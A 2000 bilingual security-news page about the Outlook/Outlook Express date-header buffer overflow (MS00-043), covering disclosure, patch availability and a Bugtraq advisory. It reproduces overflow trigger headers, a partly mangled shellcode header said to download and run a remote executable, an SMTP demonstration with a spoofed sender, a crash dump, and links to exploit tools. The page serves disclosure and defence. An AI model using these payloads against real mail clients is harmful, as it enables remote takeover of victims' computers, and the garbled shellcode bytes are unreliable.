|
Telecom and Logistics Associates |
TLAalert
Security Service
|
| |
Save Time and Money
TLAnews: Security NEWs
Service
|
|
|
|
|
 20.7.2000
Updated,
original on 19.7.2000 Security: New
attack method using MS Outlook
Simply by sending it an e-mail agressors
can take conntrol of a PC remotely. This vulnerability has wide implication. An
old computer myth is coming true. A single e-mail could destroy a victim’s
computer.
En français: Une
nouvelle methode d'attaque en utilisant MS Outlook
Simplement en envoyant un message les agresseurs peuvent prendre le contrôle
d'un PC à distance. Cette vulnérabilité a d'importantes implications. Un
vieux mythe sur les ordianteurs devient réallité. Un simple message peut
détruire un ordianteur.
Patch is now
available
|
|
|
| English
version |
|
An old computer myth is coming true. A
single e-mail could destroy a victim’s computer.
People will now be made aware and
understand a myth...
Now, a computer vandal could
conceivably take control of thousands of computers with a single
mass e-mail. Intruders can find a way in the computer as soon as the
messages is downloaded by the user. There is no need to open the
message to be hacked.
People around the world are claiming
this as beiing one of the major security flaw, we faced. Sample code
to exploit it was released on Internet.
About a month ago by a South American
security research team known as Underground Security Systems
Research, or USSR Labs. After informing Microsoft it was agreed not
to publish the information until Microsoft had a chance to supply a
fix. That’s standard practice in the computer security business in
order to prevent possible harm to computer users.
|
|
| Résumé
en français |
|
Un vieux mythe sur les
ordianteurs devient réallité. Un simple message peut détruire un
ordianteur.
L'envoi d'un mail
massif est suffisant pour qu'un vandale prenne le contrôle de
plusieurs ordianteurs à distance. L'intru peut faire son chemin
dans un ordinateur, alors que l'utiisateur est simplement dans la
phase de transfert de ses messages.
Cette failblesse a
été découverte en même temps par Ussr Labs et Aaron
Drew. La presse et les
spécialistes de sécurité font état de cette faiblesse comme
ayant des implications très sérieuses et attendent avec impatience
le correctif de Microsoft.
Le principe d'attaque
utilise un "buffer overflow" dans l'entête du message. Le
champs de la date est plus particulièrement la partie GMT n'est pas
correctement vérifiée. Cela laisse la possibilité d'ajouter des
séquences de commandes qui permettent ensuite de prendre le
contrôle du système.
Un exemple se trouve
dans la suite.
|
|
About a month ago by a South American security research team known as
Underground Security Systems Research, or USSR
Labs. After informing Microsoft
it was agreed not to publish the information until Microsoft had a chance to
supply a fix. That’s standard practice in the computer security business in
order to prevent possible harm to computer users.
Aaron Drew posted the information yesterday on Bugtraq, a security mailing
list. He and Ussr Labs informed the same day Microsoft of the existance of this
vulnerability. "This is certainly a serious one, and we will try to get the
word out any way we can” said Steve Lipner, manager of the Security Response
Center at Microsoft. This vulnerability can affect a user even if the user
follows what would normally be safe computing practices such as installing the
Outlook Security Update and using the Security Zones feature to manage the
security of his or her mail client
Home users are at the greates risks since they directly download e-mail
messages from their ISP, is what said Microsoft. To get a protection we have to
get the patch from Microsoft which is available .
MS00-043 Patch Available for "Malformed E-mail Header" Vulnerability
| Posted on Bugtraq |
A bug in a shared component of Microsoft Outlook and Outlook Express mail clients can allow a remote user to write arbitrary data to the stack.
This bug has been found to exist in all versions of MS Outlook and Outlook Express on both Windows 95/98 and Windows NT 4.
The vulnerability lies in the parsing of the GMT section of the date field in the header of an email. Bound checking on the token representing
the GMT is not properly handled. This bug can be witnessed by opening an email with an exceptionally long string directly preceding the GMT specification
in the Date header field such as:
Date: Fri, 13 July 2000 14:16:06
+1000xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxx
The bug lies in the shared library INETCOMM.DLL and has been successfully exploited on Windows 95, 98 and NT with both Outlook and Outlook
Express.
The execution of this code is performed differently under each client. Under Outlook Express, the buffer overflow occurs as soon as the user tries
to view the mail folder containing email with a malicious date header. Under Microsoft Outlook, the overflow occurs when attempting to preview,
read, reply or forward any email with a malicious date header. Under MS Outlook a user may delete or save an email to disk without exploitation.
Whilst some mail transport systems seem to modify 8-bit header data or lines over 70 characters in length preventing direct exploitation, these
restrictions seem to be avoided by encoding a message with an exploit date field as a MIME attachment in a Outlook's MIME attached message
format.
These messages also overflow the stack when read, previewed, replied to or forwarded.
Microsoft was notified of this bug on July 3.
Attached is a proof-of-point exploit that, when placed in the header field of a message or MIME attached message, will download and
execute an executable from the web. (In this particular case it will launch MS Freecell)
|
| All the cell containing the exploit
sample must be selected, <pre> and </pre> tags must be
removed |
Date: Sun, 7 May 2000 11:20:46
+10006ÝÃ^�@
Ç^�à ?<Ä-qþÿÿ<ì3É
|
| DEMONSTRATION from ussr
labs |
To test this vulnerability telnet to an SMTP server and sent the
following to yourself:
HELO
MAIL FROM: BILLGATES@MICROSOFT.COM
RCPT TO: MY@EMAIL.COM
DATA
Date: Thu,13 Jun 2000 12:33:16
+1111111111111111111111111111111111111111111111111111111111111
(dot here)
QUIT
After the remote host closed the connection and sent mail to the
appropriate address, upon receipt of the mail the following fault
was generated by Outlook:
- ----------------------------------------------------------------------
- -
OUTLOOK caused an invalid page fault in
module at 00de:00aedc5a.
Registers:
EAX=80004005 CS=016f EIP=00aedc5a EFLGS=00010286
EBX=70bd4899 SS=0177 ESP=0241ef94 EBP=31313131
ECX=00000000 DS=0177 ESI=0241efc6 FS=2b57
EDX=81c0500c ES=0177 EDI=0241efc4 GS=0000
Bytes at CS:EIP:
Stack dump:
0241f360 0241f554 00000000 00000001 00000000 004580d0 00000054
00000054
0241efc4 0000003b 00000100 00000017 3131312b 31313131 31313131
31313131
- ----------------------------------------------------------------------
- -
|
From ussrlabs web server you can get software to test the vulnerability fore
education purposes and at your own risks.
This code will create and send an e-mail message, that when downloaded by outlook, will open http://www.ussrback.com
Unix/Linux Perl Version:
http://www.ussrback.com/outoutlook.pl
Windows Console Version:
http://www.ussrback.com/outoutlook.exe
Windows Console Version Source:
http://www.ussrback.com/outoutlook.zip
more
security information with TLAnews ...
Author information.
Copyright © [Telecom and Logistics Associates Sàrl]. All rights
reserved.
Revised: juillet 20, 2000
.
|
All information provided is of a general nature and is not
intended to address the circumstances of any particular individual or entity.
Although we endeavor to provide accurate and timely information, there can be no
guarantee that such information is accurate as of the date it is received or
that it will continue to be accurate in the future. No one should act upon such
information without appropriate professional advice after a thorough examination
of the facts of the particular situation.